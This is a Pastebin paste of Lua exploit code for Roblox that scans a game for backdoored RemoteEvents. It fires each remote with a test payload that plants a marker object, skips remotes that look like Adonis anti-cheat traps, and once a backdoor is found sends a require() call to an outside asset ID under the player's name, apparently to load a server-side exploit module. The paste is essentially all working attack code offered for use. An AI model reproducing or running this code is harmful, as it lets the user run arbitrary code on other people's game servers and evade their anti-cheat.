Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- if AlreadyScanned == false then
- AlreadyScanned = true
- local GenScript = function(Remote)
- return [[i=Instance.new("StringValue", workspace) i.Name="333555777YEET" i.Value="]]..tostring(Remote:GetFullName())..[["]]
- end
- local function hasKeyword(s)
- for _, keyword in ipairs(Skip) do
- if (s:find(keyword, 1, true)) then
- return true
- end
- end
- return false
- end
- local function AntiAdonis(x)
- local ReturnValue = false
- if #x:GetChildren() ~= 0 then
- for _, v in pairs(x:GetChildren()) do
- if string.lower(v.Name) == "__function" then
- ReturnValue = true
- end
- end
- end
- return ReturnValue
- end
- local CreateFile = function()
- local Remotes = game:GetDescendants()
- for _,v in pairs(Remotes) do
- if v:IsA("RemoteEvent") and hasKeyword(v.Name) == false and not AntiAdonis(v) then
- Dict[tostring(v:GetFullName())] = v
- v:FireServer(GenScript(v))
- game:GetService("RunService").Stepped:Wait()
- end
- end
- return true
- end
- CheckGood = CreateFile()
- wait(1.5)
- local WorkspaceInstance = workspace:GetChildren()
- for _, v in pairs(WorkspaceInstance) do
- if v.Name == "333555777YEET" then
- local NewInstance = Dict[v.Value]
- v:Destroy()
- if RemoteBackdoor == nil then
- RemoteBackdoor = NewInstance
- AttachWindowDraggableFrame.Visible = false
- AttachWindowDraggableFrame.Active = false
- DraggableFrameMainFrame.Visible = true
- DraggableFrameMainFrame.Visible = true
- end
- end
- end
- if RemoteBackdoor == nil then
- wait(1.5)
- for _, v in pairs(WorkspaceInstance) do
- if v.Name == "333555777YEET" then
- local NewInstance = Dict[v.Value]
- v:Destroy()
- if RemoteBackdoor == nil then
- RemoteBackdoor = NewInstance
- AttachWindowDraggableFrame.Visible = false
- AttachWindowDraggableFrame.Active = false
- DraggableFrameMainFrame.Visible = true
- DraggableFrameMainFrame.Visible = true
- end
- end
- end
- end
- end
- if RemoteBackdoor == nil then
- showHint("Rayfield", "No backdoor found")
- else
- RemoteBackdoor:FireServer([[require(4823191136):mml("]]..LP.Name..[[")]])
- end
- end)
Advertisement
Add Comment
Please, Sign In to add comment